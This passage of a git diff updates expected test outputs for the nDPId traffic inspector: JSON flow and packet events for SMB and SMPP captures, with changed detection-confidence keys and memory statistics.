01014{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1584368315417,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":434,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":434,"pkt_l4_len":400,"thread_ts_msec":1584368315417,"pkt":"2MuK4S0uKDc3AG3ICABFAAGkAABAAEAGtNLAqAF2wKgBu94QAb3ooAVq8kMyI1AYqgDfmAAAAAABeP5TTUJAAAEAAAAAAAUAAAEAAAAAmAAAAJwPAAAAAAAA\/\/4AABEAAAAdAAAAACgAAAAAAAAAAAAAAAAAAAAAAAA5AAAAAgAAAAAAAAAAAAAAAAAAAAAAAACBABAAEAAAAAcAAAABAAAAAQAAAHgAHAAAAAAAAAAAAEwAdQBjAGEAXABEAG8AdwBuAGwAbwBhAGQAcwAAAAAA\/lNNQkAAAQAAAAAADgAAAQQAAACIAAAAnQ8AAAAAAAD\/\/gAAEQAAAB0AAAAAKAAAAAAAAAAAAAAAAAAAAAAAACEAJQMAAAAA\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/2AAJgAAAAEAaQBuAG4AbwBzAGUAdAB1AHAALQA1AC4ANgAuADEALgBlAHgAZQAAAP5TTUJAAAEAAAAAAAYAAAEEAAAAAAAAAJ4PAAAAAAAA\/\/4AABEAAAAdAAAAACgAAAAAAAAAAAAAAAAAAAAAAAAYAAAAAAAAAP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584368315417,"flow_last_seen":1584368315417,"flow_idle_time":7580000,"flow_min_l4_payload_len":380,"flow_max_l4_payload_len":380,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":1584368315417,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv23","breed":"Acceptable","category":"System"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584368315417,"flow_last_seen":1584368315417,"flow_idle_time":7580000,"flow_min_l4_payload_len":380,"flow_max_l4_payload_len":380,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":1584368315417,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv23","breed":"Acceptable","category":"System"}} 01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1584368315418,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":1584368315418,"pkt":"KDc3AG3I2MuK4S0uCABFAAIcOK5AAIAGO6zAqAG7wKgBdgG93hDyQzIj6KAG5lAYEAjw+QAAAAAB8P5TTUJAAAEAAAAAAAUAAAABAAAAmAAAAJwPAAAAAAAA\/\/4AABEAAAAdAAAAACgAAAAAAAAAAAAAAAAAAAAAAABZAAAAAQAAAPJad+s0itQBeC8Pcpz71QGM0O1xnPvVAYzQ7XGc+9UBACAAAAAAAAAAIAAAAAAAABEAAAAAAAAAEgQAAAoAAABlAAAACgAAAAAAAAAAAAAA\/lNNQkAAAQAAAAAADgAAAAUAAADYAAAAnQ8AAAAAAAD\/\/gAAEQAAAB0AAAAAKAAAAAAAAAAAAAAAAAAAAAAAAAkASACOAAAAAAAAAAAAAAAzwlM5LZjUATN2tkyb+9UBqrZQPC2Y1AHHrtHNIlnVAYD0HQAAAAAAAAAeAAAAAAAgAAAAJgAAAAAAAAAYAEkATgBOAE8AUwBFAH4AMQAuAEUAWABFAAAAq04CAAAAAQBpAG4AbgBvAHMAZQB0AHUAcAAtADUALgA2AC4AMQAuAGUAeABlAAAA\/lNNQkAAAQAAAAAABgADAAUAAAAAAAAAng8AAAAAAAD\/\/gAAEQAAAB0AAAAAKAAAAAAAAAAAAAAAAAAAAAAAADwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1584368315418,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1584368315418,"pkt":"2MuK4S0uKDc3AG3ICABFAAAoAABAAEAGtk7AqAF2wKgBu94QAb3ooAbm8kM0F1AQqfyLpgAA"} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":101,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":101,"flow_first_seen":1584368315417,"flow_last_seen":1584368317802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":25252,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1584368317802,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv23","breed":"Acceptable","category":"System"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":101,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":101,"flow_first_seen":1584368315417,"flow_last_seen":1584368317802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":25252,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1584368317802,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv23","breed":"Acceptable","category":"System"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":101,"source":"smb_deletefile.pcap","alias":"nDPId-test","packets-captured":101,"packets-processed":101,"total-skipped-flows":0,"total-l4-payload-len":25252,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1584368317802} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 101/101 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872372 bytes -~~ total memory freed........: 5872372 bytes -~~ total allocations/frees...: 118215/118215 +~~ total memory allocated....: 6006006 bytes +~~ total memory freed........: 6006006 bytes +~~ total allocations/frees...: 120977/120977 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 1139 chars diff --git a/test/results/smb_frags.pcap.out b/test/results/smb_frags.pcap.out new file mode 100644 index 000000000..cd27de70b --- /dev/null +++ b/test/results/smb_frags.pcap.out @@ -0,0 +1,24 @@ +00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"smb_frags.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"smb_frags.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1623514369772} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smb_frags.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623514369772,"flow_last_seen":1623514369772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623514369772,"l3_proto":"ip4","src_ip":"10.202.211.125","dst_ip":"10.202.7.8","src_port":54120,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smb_frags.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1623514369772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1623514369772,"pkt":"AAAAAAAAAAgAAAAIgQAGSAgARQAAPJdVQAA+BrVNCsrTfQrKBwjTaAG9gKLxEgAAAACgAv\/\/GS4AAAIEIwABAwMGBAIICs5HDEsAAAAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smb_frags.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1623514369868,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1623514369868,"pkt":"AAAAAAAAAAgAAAAIgQAGSAgARQAAPE51QAB8BsAtCsoHCArK030BvdNoZ4rlhYCi8ROgEiAAlmYAAAIEBWQBAwMIBAIICowopxfORwxL"} +00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smb_frags.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1623514369870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":121,"pkt_l4_len":83,"thread_ts_msec":1623514369870,"pkt":"AAAAAAAAAAgAAAAIgQAGSAgARQAAZ5dXQAA+BrUgCsrTfQrKBwjTaAG9gKLxE2eK5YaAGAgZ+EgAAAEBCArORwytjCinFwAAAC\/\/U01CcgAAAAAYBdgAAAAAAAAAAAAAAAD\/\/wEA\/\/8BAAAMAAJOVCBMTSAwLjEyAA=="} +00993{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"smb_frags.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1623514369772,"flow_last_seen":1623514370258,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1623514370258,"l3_proto":"ip4","src_ip":"10.202.211.125","dst_ip":"10.202.7.8","src_port":54120,"dst_port":445,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"20": {"risk":"SMB Insecure Vers","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +01031{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8,"source":"smb_frags.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1623514369772,"flow_last_seen":1623514370351,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":2187,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1623514370351,"l3_proto":"ip4","src_ip":"10.202.211.125","dst_ip":"10.202.7.8","src_port":54120,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"20": {"risk":"SMB Insecure Vers","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":8,"source":"smb_frags.pcap","alias":"nDPId-test","packets-captured":8,"packets-processed":8,"total-skipped-flows":0,"total-l4-payload-len":2187,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1623514370351} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 8/8 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 2187 bytes +~~ total detected protocols..: 1 +~~ total active/idle flows...: 1/1 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6005390 bytes +~~ total memory freed........: 6005390 bytes +~~ total allocations/frees...: 120887/120887 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 465 chars +~~ json string max len.......: 1036 chars +~~ json string avg len.......: 718 chars diff --git a/test/results/smbv1.pcap.out b/test/results/smbv1.pcap.out index d1fdaad67..4144d0a60 100644 --- a/test/results/smbv1.pcap.out +++ b/test/results/smbv1.pcap.out @@ -4,8 +4,8 @@ 00635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1492191036092,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1492191036092,"pkt":"AFBW6AqxAAwpAu9qCABFAACxF9IAAIAGzm+sEJyCCoAA88bvAb3S22hjm3waG1AY+vCemgAAAAAAhf9TTUJyAAAAABhTwAAAAAAAAAAAAAAAAAAA\/\/4AAEAAAGIAAlBDIE5FVFdPUksgUFJPR1JBTSAxLjAAAkxBTk1BTjEuMAACV2luZG93cyBmb3IgV29ya2dyb3VwcyAzLjFhAAJMTTEuMlgwMDIAAkxBTk1BTjIuMQACTlQgTE0gMC4xMgA="} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1492191036120,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1492191036120,"pkt":"AAwpAu9qAFBW6AqxCABFAACdcSEAAIAGdTQKgADzrBCcggG9xu+bfBob0tto7FAY+vCpnwAAAAAAcf9TTUJyAAAAAJhTwAAAAAAAAAAAAAAAAAAA\/\/4AAEAAEQUAAzIAAQAEEQAAAAABAAAAAAD84wEAQPSc00S10gHwAAgsAAirHC\/h7OapVwBPAFIASwBHAFIATwBVAFAAAABKAE8ASABOAC0AUABDAAAA"} 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1492191036120,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1492191036120,"pkt":"AFBW6AqxAAwpAu9qCABFAAC0F9MAAIAGzmusEJyCCoAA88bvAb3S22jsm3wakFAY+ns\/iQAAAAAAiP9TTUJzAAAAABgHwAAAAAAAAAAAAAAAAAAA\/\/4AAEAADf8AiAAEEQoAAAAAAAAAAQAAAAAAAADUAAAASwAAAAAAAFcAaQBuAGQAbwB3AHMAIAAyADAAMAAwACAAMgAxADkANQAAAFcAaQBuAGQAbwB3AHMAIAAyADAAMAAwACAANQAuADAAAAA="} -00991{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492191036092,"flow_last_seen":1492191036120,"flow_idle_time":7580000,"flow_min_l4_payload_len":117,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":131,"midstream":1,"thread_ts_msec":1492191036120,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"20": {"risk":"SMB Insecure Vers","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -01029{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1492191036092,"flow_last_seen":1492191036191,"flow_idle_time":7580000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":819,"flow_avg_l4_payload_len":117,"midstream":1,"thread_ts_msec":1492191036191,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"20": {"risk":"SMB Insecure Vers","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00991{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492191036092,"flow_last_seen":1492191036120,"flow_idle_time":7580000,"flow_min_l4_payload_len":117,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":131,"midstream":1,"thread_ts_msec":1492191036120,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"20": {"risk":"SMB Insecure Vers","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +01029{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1492191036092,"flow_last_seen":1492191036191,"flow_idle_time":7580000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":819,"flow_avg_l4_payload_len":117,"midstream":1,"thread_ts_msec":1492191036191,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"20": {"risk":"SMB Insecure Vers","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":7,"source":"smbv1.pcap","alias":"nDPId-test","packets-captured":7,"packets-processed":7,"total-skipped-flows":0,"total-l4-payload-len":819,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1492191036191} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 7/7 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871727 bytes -~~ total memory freed........: 5871727 bytes -~~ total allocations/frees...: 118124/118124 +~~ total memory allocated....: 6005361 bytes +~~ total memory freed........: 6005361 bytes +~~ total allocations/frees...: 120886/120886 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 1034 chars diff --git a/test/results/smpp_in_general.pcap.out b/test/results/smpp_in_general.pcap.out index 0186d5eca..fd51524c1 100644 --- a/test/results/smpp_in_general.pcap.out +++ b/test/results/smpp_in_general.pcap.out @@ -4,8 +4,8 @@ 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1217149853878,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1217149853878,"pkt":"AAKlxo7UABbU5r3hCABFAAAwUN5AAIAG\/3kK4sp2CuLKNQbqIyjmvft6AAAAAHACf\/9NLQAAAgQE7AEBBAI="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1217149853879,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1217149853879,"pkt":"ABbU5r3hAAKlxo7UCABFAAAsMy0AADwGoS8K4so1CuLKdiMoBuqoDP5A5r37e2AS8ABLDAAAAgQFtAAA"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1217149853879,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1217149853879,"pkt":"AAKlxo7UABbU5r3hCABFAAAoUN9AAIAG\/4AK4sp2CuLKNQbqIyjmvft7qAz+QVAQhOTN5QAA"} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1217149853878,"flow_last_seen":1217149853879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1217149853879,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SMPP","breed":"Acceptable","category":"Download"}} -00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1217149853878,"flow_last_seen":1217149884833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1217149884833,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SMPP","breed":"Acceptable","category":"Download"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1217149853878,"flow_last_seen":1217149853879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1217149853879,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"SMPP","breed":"Acceptable","category":"Download"}} +00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1217149853878,"flow_last_seen":1217149884833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1217149884833,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SMPP","breed":"Acceptable","category":"Download"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":17,"source":"smpp_in_general.pcap","alias":"nDPId-test","packets-captured":17,"packets-processed":17,"total-skipped-flows":0,"total-l4-payload-len":200,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1217149884833} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 17/17 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871984 bytes -~~ total memory freed........: 5871984 bytes -~~ total allocations/frees...: 118132/118132 +~~ total memory allocated....: 6005618 bytes +~~ total memory freed........: 6005618 bytes +~~ total allocations/frees...: 120894/120894 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 694 chars diff --git a/test/results/smtp-starttls.pcap.out b/test/results/smtp-starttls.pcap.out index 4a9b9aefb..23d838f39 100644 --- 